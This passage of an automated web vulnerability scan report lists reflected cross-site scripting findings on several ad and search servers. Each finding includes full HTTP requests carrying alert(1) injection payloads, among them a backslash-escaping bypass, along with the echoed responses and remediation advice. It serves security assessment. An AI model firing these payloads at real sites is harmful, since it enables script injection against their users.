GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=c87d8'-alert(1)-'4a69ed925e5&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:10:00 GMT
Content-Length: 1899
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:10:00 GMT; path=/
Set-Cookie: _curtime=1317600600; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:20:00 GMT; path=/
Set-Cookie: camfreq_1871838429=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:50:00 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:10:00 GMT; path=/

document.write('<div id="c87d8'-alert(1)-'4a69ed925e5" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAAAAAAAAAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANTU3ODUzMDctQTV
...[SNIP]...
4.90. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af1e4'-alert(1)-'5f597972d07 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=af1e4'-alert(1)-'5f597972d07&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:56 GMT
Content-Length: 1899
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:56 GMT; path=/
Set-Cookie: _curtime=1317600596; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:19:56 GMT; path=/
Set-Cookie: camfreq_760586164=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:56 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:56 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...
etFrequecy=0&kadwidth=160&kadheight=600&kadsizeid=10&kltstamp=1317600596&indirectAdId=0&adServerOptimizerId=2&ranreq=0.38537488016299903&campaignId=3663&creativeId=7441&pctr=0.000000&imprCap=1&pageURL=af1e4'-alert(1)-'5f597972d07">
...[SNIP]...
4.91. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd260'-alert(1)-'54ab733c75f was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903bd260'-alert(1)-'54ab733c75f&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:10:03 GMT
Content-Length: 1935
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:10:03 GMT; path=/
Set-Cookie: _curtime=1317600603; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:20:03 GMT; path=/
Set-Cookie: camfreq_1325556632=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:50:03 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:10:03 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...
dId=21044&adServerId=243&kefact=0.620000&kpbmtpfact=1.000000&kadNetFrequecy=0&kadwidth=160&kadheight=600&kadsizeid=10&kltstamp=1317600603&indirectAdId=0&adServerOptimizerId=2&ranreq=0.38537488016299903bd260'-alert(1)-'54ab733c75f&campaignId=3663&creativeId=7441&pctr=0.000000&imprCap=1&pageURL=http://dm.travelocity.com/html.ng/adsize">
...[SNIP]...
4.92. http://static.igougo.com/traveldeals/iAuto.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://static.igougo.com
Path:   /traveldeals/iAuto.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e7ab'%20a%3db%207cecbc91030 was submitted in the REST URL parameter 1. This input was echoed as 7e7ab' a=b 7cecbc91030 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /traveldeals7e7ab'%20a%3db%207cecbc91030/iAuto.aspx HTTP/1.1
Host: static.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-1

Response

HTTP/1.1 500 Internal Server Error
X-Strangeloop: Compression
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Expires: Mon, 03 Oct 2011 00:27:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:27:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 36828


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<input name="currentPage" type="hidden" value='/traveldeals7e7ab' a=b 7cecbc91030/iAuto.aspx?'/>
...[SNIP]...
4.93. http://tacoda-fatcat.search.aol.com/fa/eval [att parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda-fatcat.search.aol.com
Path:   /fa/eval

Issue detail

The value of the att request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6ca56%3balert(1)//546d6db2be8 was submitted in the att parameter. This input was echoed as 6ca56;alert(1)//546d6db2be8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fa/eval?count=10&att=application%3ATACODA_CUSTOM_TRAVEL,callback%3ATACJSONCB6ca56%3balert(1)//546d6db2be8&format=json&query=dest%20Boston%20United%20States%20date%200T3%20type%20HOTEL HTTP/1.1
Host: tacoda-fatcat.search.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_guid=2f9678d8f41740d687e7e08bd6b0682c:050911; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:49 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 1027
Cache-Control: max-age=3600
Expires: Mon, 03 Oct 2011 01:13:49 GMT

var _results = {"query":"dest Boston United States date 0T3 type HOTEL","count":2,"data":[{"topic":"queries","fullqueryTerm":"dest Boston United States date 0T3 type HOTEL","weight":"1000","ruleName":
...[SNIP]...
=HOTEL&fullquery=dest Boston United States date 0T3 type HOTEL","tacQueries":"TAC:CC2:Custom:Topics:Travel:PricelineTypes","queriesTerm":"HOTEL","ruleSetName":"tacoda_custom_travelmodes"}]};

TACJSONCB6ca56;alert(1)//546d6db2be8(_results);
4.94. http://tacoda-fatcat.search.aol.com/fa/eval [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda-fatcat.search.aol.com
Path:   /fa/eval

Issue detail

The value of the query request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d55a\"%3balert(1)//ecaf85f8f3d was submitted in the query parameter. This input was echoed as 7d55a\\";alert(1)//ecaf85f8f3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /fa/eval?count=10&att=application%3ATACODA_CUSTOM_TRAVEL,callback%3ATACJSONCB&format=json&query=dest%20Boston%20United%20States%20date%200T3%20type%20HOTEL7d55a\"%3balert(1)//ecaf85f8f3d HTTP/1.1
Host: tacoda-fatcat.search.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_guid=2f9678d8f41740d687e7e08bd6b0682c:050911; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:01 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 654
Cache-Control: max-age=3600
Expires: Mon, 03 Oct 2011 01:14:01 GMT

var _results = {"query":"dest Boston United States date 0T3 type HOTEL7d55a\\";alert(1)//ecaf85f8f3d","count":1,"data":[{"topic":"queries","fullqueryTerm":"dest Boston United States date 0T3 type HOTEL7d55a\\";alert(1)//ecaf85f8f3d","weight":"1000","ruleName":"cc20ct0tra0rad0pline","matchedField":"de
...[SNIP]...
4.95. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84a47"%3balert(1)//e66ef953f71 was submitted in the action parameter. This input was echoed as 84a47";alert(1)//e66ef953f71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD84a47"%3balert(1)//e66ef953f71&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Last-Modified: Mon, 26 Sep 02011 15:35:33 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:20 GMT
Content-Length: 8858
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:00 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD84a47";alert(1)//e66ef953f71";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.
...[SNIP]...
4.96. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a8cf"%3balert(1)//78f2c95f7bc was submitted in the cwadformat parameter. This input was echoed as 2a8cf";alert(1)//78f2c95f7bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X2502a8cf"%3balert(1)//78f2c95f7bc&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Last-Modified: Mon, 26 Sep 02011 15:53:50 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 8886
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:24 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:04 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X2502a8cf";alert(1)//78f2c95f7bc";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X2502a8cf";alert(1)//78f2c95f7bc";var cn="1";var epid="";var esid="";

       String.prototyp
...[SNIP]...
4.97. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa854"%3balert(1)//0151e8bd225 was submitted in the cwheight parameter. This input was echoed as aa854";alert(1)//0151e8bd225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250aa854"%3balert(1)//0151e8bd225&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Last-Modified: Mon, 26 Sep 02011 15:58:39 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:31 GMT
Content-Length: 8858
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:11 GMT; Path=/

function cw_Process() {
   try {
